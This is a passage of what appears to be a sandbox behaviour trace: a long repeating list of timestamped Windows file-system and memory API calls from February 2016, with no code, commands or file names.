{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,004", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,034", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,074", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,104", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,134", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,154", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,174", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,214", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", 